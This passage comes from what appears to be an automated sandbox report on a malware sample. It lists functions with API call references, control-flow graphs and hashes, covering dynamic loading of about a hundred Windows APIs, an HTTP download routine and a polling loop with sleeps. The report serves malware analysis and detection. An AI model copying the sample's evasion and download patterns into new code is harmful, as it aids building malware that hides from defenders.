                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
                    • Instruction ID: 5cf26d08c785ec9b0d3d326c4a9f0f4e1ed096289aa6da4abb3ce0d5ff52cb54
                    • Opcode Fuzzy Hash: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
                    • Instruction Fuzzy Hash: B7F044F1944208AFC700DF95DD45FAEBBB8F704751F100159FA05E3680C7781904CBA2
                    Function 003B1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                    • Instruction ID: 767420209e0aeff40f29aeb1bc64090218ba4525e7fb29b236cd7ba78641afad
                    • Opcode Fuzzy Hash: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                    • Instruction Fuzzy Hash: DED05EB490130CDBCB00EFE0D849AEDBB78FB08315F000554D909B2340EA346486CAA6
                    Function 003C9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 3c9c10-3c9c1a 634 3ca036-3ca0ca LoadLibraryA * 8 633->634 635 3c9c20-3ca031 GetProcAddress * 43 633->635 636 3ca0cc-3ca141 GetProcAddress * 5 634->636 637 3ca146-3ca14d 634->637 635->634 636->637 638 3ca216-3ca21d 637->638 639 3ca153-3ca211 GetProcAddress * 8 637->639 640 3ca21f-3ca293 GetProcAddress * 5 638->640 641 3ca298-3ca29f 638->641 639->638 640->641 642 3ca2a5-3ca332 GetProcAddress * 6 641->642 643 3ca337-3ca33e 641->643 642->643 644 3ca41f-3ca426 643->644 645 3ca344-3ca41a GetProcAddress * 9 643->645 646 3ca428-3ca49d GetProcAddress * 5 644->646 647 3ca4a2-3ca4a9 644->647 645->644 646->647 648 3ca4dc-3ca4e3 647->648 649 3ca4ab-3ca4d7 GetProcAddress * 2 647->649 650 3ca515-3ca51c 648->650 651 3ca4e5-3ca510 GetProcAddress * 2 648->651 649->648 652 3ca612-3ca619 650->652 653 3ca522-3ca60d GetProcAddress * 10 650->653 651->650 654 3ca67d-3ca684 652->654 655 3ca61b-3ca678 GetProcAddress * 4 652->655 653->652 656 3ca69e-3ca6a5 654->656 657 3ca686-3ca699 GetProcAddress 654->657 655->654 658 3ca708-3ca709 656->658 659 3ca6a7-3ca703 GetProcAddress * 4 656->659 657->656 659->658
                    APIs
                    • GetProcAddress.KERNEL32(76210000,01175550), ref: 003C9C2D
                    • GetProcAddress.KERNEL32(76210000,011756B0), ref: 003C9C45
                    • GetProcAddress.KERNEL32(76210000,01189030), ref: 003C9C5E
                    • GetProcAddress.KERNEL32(76210000,01189048), ref: 003C9C76
                    • GetProcAddress.KERNEL32(76210000,01189060), ref: 003C9C8E
                    • GetProcAddress.KERNEL32(76210000,0118D918), ref: 003C9CA7
                    • GetProcAddress.KERNEL32(76210000,0117A548), ref: 003C9CBF
                    • GetProcAddress.KERNEL32(76210000,0118D828), ref: 003C9CD7
                    • GetProcAddress.KERNEL32(76210000,0118DAB0), ref: 003C9CF0
                    • GetProcAddress.KERNEL32(76210000,0118DA38), ref: 003C9D08
                    • GetProcAddress.KERNEL32(76210000,0118D888), ref: 003C9D20
                    • GetProcAddress.KERNEL32(76210000,01175570), ref: 003C9D39
                    • GetProcAddress.KERNEL32(76210000,01175350), ref: 003C9D51
                    • GetProcAddress.KERNEL32(76210000,01175590), ref: 003C9D69
                    • GetProcAddress.KERNEL32(76210000,01175450), ref: 003C9D82
                    • GetProcAddress.KERNEL32(76210000,0118D9D8), ref: 003C9D9A
                    • GetProcAddress.KERNEL32(76210000,0118DA80), ref: 003C9DB2
                    • GetProcAddress.KERNEL32(76210000,0117A908), ref: 003C9DCB
                    • GetProcAddress.KERNEL32(76210000,01175650), ref: 003C9DE3
                    • GetProcAddress.KERNEL32(76210000,0118DA68), ref: 003C9DFB
                    • GetProcAddress.KERNEL32(76210000,0118D990), ref: 003C9E14
                    • GetProcAddress.KERNEL32(76210000,0118D948), ref: 003C9E2C
                    • GetProcAddress.KERNEL32(76210000,0118D8A0), ref: 003C9E44
                    • GetProcAddress.KERNEL32(76210000,01175490), ref: 003C9E5D
                    • GetProcAddress.KERNEL32(76210000,0118D858), ref: 003C9E75
                    • GetProcAddress.KERNEL32(76210000,0118D9C0), ref: 003C9E8D
                    • GetProcAddress.KERNEL32(76210000,0118DA50), ref: 003C9EA6
                    • GetProcAddress.KERNEL32(76210000,0118DA98), ref: 003C9EBE
                    • GetProcAddress.KERNEL32(76210000,0118D9F0), ref: 003C9ED6
                    • GetProcAddress.KERNEL32(76210000,0118D8E8), ref: 003C9EEF
                    • GetProcAddress.KERNEL32(76210000,0118D7C8), ref: 003C9F07
                    • GetProcAddress.KERNEL32(76210000,0118D8B8), ref: 003C9F1F
                    • GetProcAddress.KERNEL32(76210000,0118D8D0), ref: 003C9F38
                    • GetProcAddress.KERNEL32(76210000,0117FE70), ref: 003C9F50
                    • GetProcAddress.KERNEL32(76210000,0118D9A8), ref: 003C9F68
                    • GetProcAddress.KERNEL32(76210000,0118D810), ref: 003C9F81
                    • GetProcAddress.KERNEL32(76210000,01175390), ref: 003C9F99
                    • GetProcAddress.KERNEL32(76210000,0118D7E0), ref: 003C9FB1
                    • GetProcAddress.KERNEL32(76210000,01175370), ref: 003C9FCA
                    • GetProcAddress.KERNEL32(76210000,0118D7F8), ref: 003C9FE2
                    • GetProcAddress.KERNEL32(76210000,0118D900), ref: 003C9FFA
                    • GetProcAddress.KERNEL32(76210000,011754B0), ref: 003CA013
                    • GetProcAddress.KERNEL32(76210000,011754D0), ref: 003CA02B
                    • LoadLibraryA.KERNEL32(0118D960,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA03D
                    • LoadLibraryA.KERNEL32(0118DA08,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA04E
                    • LoadLibraryA.KERNEL32(0118D840,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA060
                    • LoadLibraryA.KERNEL32(0118D870,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA072
                    • LoadLibraryA.KERNEL32(0118D930,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA083
                    • LoadLibraryA.KERNEL32(0118D978,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA095
                    • LoadLibraryA.KERNEL32(0118DA20,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0A7
                    • LoadLibraryA.KERNEL32(0118DAF8,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0B8
                    • GetProcAddress.KERNEL32(751E0000,01175190), ref: 003CA0DA
                    • GetProcAddress.KERNEL32(751E0000,0118DD08), ref: 003CA0F2
                    • GetProcAddress.KERNEL32(751E0000,01188B40), ref: 003CA10A
                    • GetProcAddress.KERNEL32(751E0000,0118DD98), ref: 003CA123
                    • GetProcAddress.KERNEL32(751E0000,011750F0), ref: 003CA13B
                    • GetProcAddress.KERNEL32(701C0000,0117A610), ref: 003CA160
                    • GetProcAddress.KERNEL32(701C0000,01174FB0), ref: 003CA179
                    • GetProcAddress.KERNEL32(701C0000,0117A570), ref: 003CA191
                    • GetProcAddress.KERNEL32(701C0000,0118DAC8), ref: 003CA1A9
                    • GetProcAddress.KERNEL32(701C0000,0118DB88), ref: 003CA1C2
                    • GetProcAddress.KERNEL32(701C0000,011750D0), ref: 003CA1DA
                    • GetProcAddress.KERNEL32(701C0000,01174FD0), ref: 003CA1F2
                    • GetProcAddress.KERNEL32(701C0000,0118DB10), ref: 003CA20B
                    • GetProcAddress.KERNEL32(753A0000,011752B0), ref: 003CA22C
                    • GetProcAddress.KERNEL32(753A0000,01174FF0), ref: 003CA244
                    • GetProcAddress.KERNEL32(753A0000,0118DCF0), ref: 003CA25D
                    • GetProcAddress.KERNEL32(753A0000,0118DD50), ref: 003CA275
                    • GetProcAddress.KERNEL32(753A0000,01175270), ref: 003CA28D
                    • GetProcAddress.KERNEL32(76310000,0117A7F0), ref: 003CA2B3
                    • GetProcAddress.KERNEL32(76310000,0117A868), ref: 003CA2CB
                    • GetProcAddress.KERNEL32(76310000,0118DC90), ref: 003CA2E3
                    • GetProcAddress.KERNEL32(76310000,01175290), ref: 003CA2FC
                    • GetProcAddress.KERNEL32(76310000,011752D0), ref: 003CA314
                    • GetProcAddress.KERNEL32(76310000,0117A890), ref: 003CA32C
                    • GetProcAddress.KERNEL32(76910000,0118DD80), ref: 003CA352
                    • GetProcAddress.KERNEL32(76910000,011752F0), ref: 003CA36A
                    • GetProcAddress.KERNEL32(76910000,01188BC0), ref: 003CA382
                    • GetProcAddress.KERNEL32(76910000,0118DBB8), ref: 003CA39B
                    • GetProcAddress.KERNEL32(76910000,0118DCA8), ref: 003CA3B3
                    • GetProcAddress.KERNEL32(76910000,01175010), ref: 003CA3CB
                    • GetProcAddress.KERNEL32(76910000,01175030), ref: 003CA3E4
                    • GetProcAddress.KERNEL32(76910000,0118DB58), ref: 003CA3FC
                    • GetProcAddress.KERNEL32(76910000,0118DAE0), ref: 003CA414
                    • GetProcAddress.KERNEL32(75B30000,01175310), ref: 003CA436
                    • GetProcAddress.KERNEL32(75B30000,0118DC00), ref: 003CA44E
                    • GetProcAddress.KERNEL32(75B30000,0118DCD8), ref: 003CA466
                    • GetProcAddress.KERNEL32(75B30000,0118DD20), ref: 003CA47F
                    • GetProcAddress.KERNEL32(75B30000,0118DBA0), ref: 003CA497
                    • GetProcAddress.KERNEL32(75670000,01175330), ref: 003CA4B8
                    • GetProcAddress.KERNEL32(75670000,011750B0), ref: 003CA4D1
                    • GetProcAddress.KERNEL32(76AC0000,01175070), ref: 003CA4F2
                    • GetProcAddress.KERNEL32(76AC0000,0118DCC0), ref: 003CA50A
                    • GetProcAddress.KERNEL32(6F4E0000,01174F50), ref: 003CA530
                    • GetProcAddress.KERNEL32(6F4E0000,01175110), ref: 003CA548
                    • GetProcAddress.KERNEL32(6F4E0000,01175130), ref: 003CA560
                    • GetProcAddress.KERNEL32(6F4E0000,0118DB70), ref: 003CA579
                    • GetProcAddress.KERNEL32(6F4E0000,01175050), ref: 003CA591
                    • GetProcAddress.KERNEL32(6F4E0000,01175210), ref: 003CA5A9
                    • GetProcAddress.KERNEL32(6F4E0000,01174F70), ref: 003CA5C2
                    • GetProcAddress.KERNEL32(6F4E0000,01174F90), ref: 003CA5DA
                    • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003CA5F1
                    • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 003CA607
                    • GetProcAddress.KERNEL32(75AE0000,0118DC60), ref: 003CA629
                    • GetProcAddress.KERNEL32(75AE0000,01188AE0), ref: 003CA641
                    • GetProcAddress.KERNEL32(75AE0000,0118DB40), ref: 003CA659
                    • GetProcAddress.KERNEL32(75AE0000,0118DDB0), ref: 003CA672
                    • GetProcAddress.KERNEL32(76300000,01175090), ref: 003CA693
                    • GetProcAddress.KERNEL32(6E7F0000,0118DB28), ref: 003CA6B4
                    • GetProcAddress.KERNEL32(6E7F0000,01175150), ref: 003CA6CD
                    • GetProcAddress.KERNEL32(6E7F0000,0118DBD0), ref: 003CA6E5
                    • GetProcAddress.KERNEL32(6E7F0000,0118DBE8), ref: 003CA6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                    • Instruction ID: 4bb6e9cd1f57b81c338ee2403ed6a875b4906cc145f0a81b7eccb3901f5db369
                    • Opcode Fuzzy Hash: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                    • Instruction Fuzzy Hash: 1B626BF5502201AFC748EFA9ED88D7637F9F76C241704851AA60DC3269D77DA80AEB13
                    Function 003B6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1033 3b6280-3b630b call 3ca7a0 call 3b47b0 call 3ca740 InternetOpenA StrCmpCA 1040 3b630d 1033->1040 1041 3b6314-3b6318 1033->1041 1040->1041 1042 3b6509-3b6525 call 3ca7a0 call 3ca800 * 2 1041->1042 1043 3b631e-3b6342 InternetConnectA 1041->1043 1062 3b6528-3b652d 1042->1062 1045 3b6348-3b634c 1043->1045 1046 3b64ff-3b6503 InternetCloseHandle 1043->1046 1048 3b635a 1045->1048 1049 3b634e-3b6358 1045->1049 1046->1042 1051 3b6364-3b6392 HttpOpenRequestA 1048->1051 1049->1051 1053 3b6398-3b639c 1051->1053 1054 3b64f5-3b64f9 InternetCloseHandle 1051->1054 1056 3b639e-3b63bf InternetSetOptionA 1053->1056 1057 3b63c5-3b6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1059 3b642c-3b644b call 3c8940 1057->1059 1060 3b6407-3b6427 call 3ca740 call 3ca800 * 2 1057->1060 1067 3b64c9-3b64e9 call 3ca740 call 3ca800 * 2 1059->1067 1068 3b644d-3b6454 1059->1068 1060->1062 1067->1062 1071 3b64c7-3b64ef InternetCloseHandle 1068->1071 1072 3b6456-3b6480 InternetReadFile 1068->1072 1071->1054 1076 3b648b 1072->1076 1077 3b6482-3b6489 1072->1077 1076->1071 1077->1076 1080 3b648d-3b64c5 call 3ca9b0 call 3ca8a0 call 3ca800 1077->1080 1080->1072
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                    • HttpOpenRequestA.WININET(00000000,GET,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B6385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003B63FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B646D
                    • InternetCloseHandle.WININET(00000000), ref: 003B64EF
                    • InternetCloseHandle.WININET(00000000), ref: 003B64F9
                    • InternetCloseHandle.WININET(00000000), ref: 003B6503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                    • Instruction ID: 57935fe887dc330a179c915dc9b75f6ca30ed45f3ffea34f32011d032ee37fa3
                    • Opcode Fuzzy Hash: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                    • Instruction Fuzzy Hash: F4717F71A00308ABDB25EB90DC49FEE7778FB44704F108059F209AB591DBB86E85DF52
                    Function 003C5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1090 3c5510-3c5577 call 3c5ad0 call 3ca820 * 3 call 3ca740 * 4 1106 3c557c-3c5583 1090->1106 1107 3c5585-3c55b6 call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 1106->1107 1108 3c55d7-3c564c call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1106->1108 1123 3c55bb-3c55d2 call 3ca8a0 call 3ca800 1107->1123 1134 3c5693-3c56a9 call 3caad0 StrCmpCA 1108->1134 1138 3c564e-3c568e call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1108->1138 1123->1134 1139 3c57dc-3c5844 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1134->1139 1140 3c56af-3c56b6 1134->1140 1138->1134 1269 3c5ac3-3c5ac6 1139->1269 1142 3c56bc-3c56c3 1140->1142 1143 3c57da-3c585f call 3caad0 StrCmpCA 1140->1143 1146 3c571e-3c5793 call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1142->1146 1147 3c56c5-3c5719 call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1142->1147 1162 3c5865-3c586c 1143->1162 1163 3c5991-3c59f9 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1143->1163 1146->1143 1246 3c5795-3c57d5 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1146->1246 1147->1143 1168 3c598f-3c5a14 call 3caad0 StrCmpCA 1162->1168 1169 3c5872-3c5879 1162->1169 1163->1269 1198 3c5a28-3c5a91 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1168->1198 1199 3c5a16-3c5a21 Sleep 1168->1199 1175 3c587b-3c58ce call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1169->1175 1176 3c58d3-3c5948 call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 3c594a-3c598a call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1176->1274 1198->1269 1199->1106 1246->1143 1274->1168
                    APIs
                      • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                      • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C56A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5857
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                      • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C532F
                      • Part of subcall function 003C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                      • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C5383
                      • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C53AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5A0C
                    • Sleep.KERNEL32(0000EA60), ref: 003C5A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                    • Instruction ID: 54d980bb9d910f255f9e6129d7615281ed3b0eb0958e1cb51f41fc8a8079e50b
                    • Opcode Fuzzy Hash: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                    • Instruction Fuzzy Hash: D4E13E729106089BCB16FBA0DC56FFD7738AB54304F50812CB506EA591EF346E4DDBA2
                    Function 003C17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
